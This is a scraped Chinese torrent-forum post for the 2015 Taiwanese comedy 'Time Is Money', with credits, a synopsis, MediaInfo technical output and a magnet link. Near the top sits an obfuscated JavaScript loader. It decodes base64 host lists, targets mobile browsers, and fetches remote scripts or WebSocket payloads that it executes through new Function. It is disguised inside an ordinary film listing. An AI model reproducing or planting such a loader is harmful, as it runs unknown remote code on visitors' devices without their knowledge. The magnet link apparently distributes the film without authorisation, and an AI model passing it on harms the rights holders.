十万伙急[国语音轨].Time.ls.Money.2015.2160p.HDR.WEB-DL.H265.AAC 7.21GB

版主小s 1月前 179

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 十万伙急 / Time ls Money / No Money No Talk
◎片  名 十萬夥急
◎年  代 2015
◎产  地 中国台湾
◎类  别 喜剧 / 悬疑
◎语  言 汉语普通话
◎上映日期 2015-04-17(中国大陆) / 2015-01-16(中国台湾)
◎IMDb链接 https://www.imdb.com/title/tt7726392/
◎豆瓣评分 3.6/10 (916人评价)
◎豆瓣链接 https://movie.douban.com/subject/26312979/
◎片  长 86分钟(中国大陆)
◎导  演 康晋荣 Chin-Jung Kang (id:1320834)
◎编  剧 康晋荣 Chin-Jung Kang (id:1320834)
       陆欣芷 Hsin-Chih Lu (id:1348200)
◎演  员 康晋荣 Chin-Jung Kang (id:1320834)
       李国煌 Mark Lee (id:1329095)
       吴孟达 Man Tat Ng (id:1016771)
       王彩桦 Lotus Wang (id:1318813)
       王棠云 Sarah Wang (id:1348201)
       吴宗宪 Jacky Wu (id:1274877)
       欧弟 O Ti (id:1317360)
       素珠 Siu Chu (id:1347766)
       唐从圣 Tsung Sheng Tang (id:1315727)
       庹宗康 Tsuong Kang To (id:1314271)
       黄嘉千 Phoebe Huang (id:1314705)
       孟庆而 Cheer (id:1445526)
       王威翔 Weica Wang (id:1431058)

◎标  签 台湾 / 喜剧 / 2015 / 吴孟达 / 台湾电影 / 康康 / 台灣 / 电影

◎简  介
  陈默(康康 饰)原是富二代,却因好赌不但气死老爸更败光家财,成了“负二代”,身无分文,只有父亲留给他一张画家楚中天(李国煌 饰)的画作,但这幅画只值十万元,根本不够还清赌债。他和地下钱庄的老板突然看到电视上报导画家张老千过世而让画作价值爆涨的新闻,因此他被逼飞往新加坡杀害楚中天,好让画作增值还债,他所有的杀人资本就是十万元。                                    
                                楚中天与朱月坡(吴孟达 饰)也曾因张老千的画结下深仇,朱月坡更因此入狱坐牢,逃狱成功的他誓言要追杀楚中天。楚中天在腹背受敌的状况下,只好接受画廊经纪人建议,飞往马来西亚,寻求美女经纪人胡晶(王予柔 饰)的帮助,避难兼卖画,4人终于在马来西亚相会,展开一场尔虞我诈、真假难辨的追杀之旅……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 236948837626022875485720407323734927652 (0xB242AFA8A6D57E772EB7505754236924)

  4. Complete name                            : 十万伙急[email protected]kv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 7.21 GiB

  8. Duration                                 : 1 h 25 min

  9. Overall bit rate                         : 12.0 Mb/s

  10. Encoded date                             : UTC 2021-08-07 13:44:39

  11. Writing application                      : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library                          : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@High

  18. HDR format                               : SMPTE ST 2086, HDR10 compatible

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 25 min

  21. Bit rate                                 : 11.9 Mb/s

  22. Width                                    : 3 840 pixels

  23. Height                                   : 1 608 pixels

  24. Display aspect ratio                     : 2.40:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 25.000 FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.077

  31. Stream size                              : 7.14 GiB (99%)

  32. Default                                  : Yes

  33. Forced                                   : No

  34. Color range                              : Limited

  35. Color primaries                          : BT.2020

  36. Transfer characteristics                 : PQ

  37. Matrix coefficients                      : BT.2020 non-constant

  38. Mastering display color primaries        : R: x=0.708000 y=0.292000, G: x=0.170000 y=0.797000, B: x=0.130000 y=0.046000, White point: x=0.312700 y=0.329000

  39. Mastering display luminance              : min: 0.0001 cd/m2, max: 1000 cd/m2

  40. Maximum Content Light Level              : 679 cd/m2

  41. Maximum Frame-Average Light Level        : 304 cd/m2


  42. Audio

  43. ID                                       : 2

  44. Format                                   : AAC LC

  45. Format/Info                              : Advanced Audio Codec Low Complexity

  46. Codec ID                                 : A_AAC-2

  47. Duration                                 : 1 h 25 min

  48. Bit rate                                 : 124 kb/s

  49. Channel(s)                               : 2 channels

  50. Channel layout                           : L R

  51. Sampling rate                            : 44.1 kHz

  52. Frame rate                               : 43.066 FPS (1024 SPF)

  53. Compression mode                         : Lossy

  54. Stream size                              : 76.4 MiB (1%)

  55. Language                                 : Chinese

  56. Default                                  : Yes

  57. Forced                                   : No



TAGS 悬疑 喜剧

磁力链:
  • magnet:?xt=urn:btih:2F101764AEDEF4A0EA6AA7A0775B461D5F9194FC

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回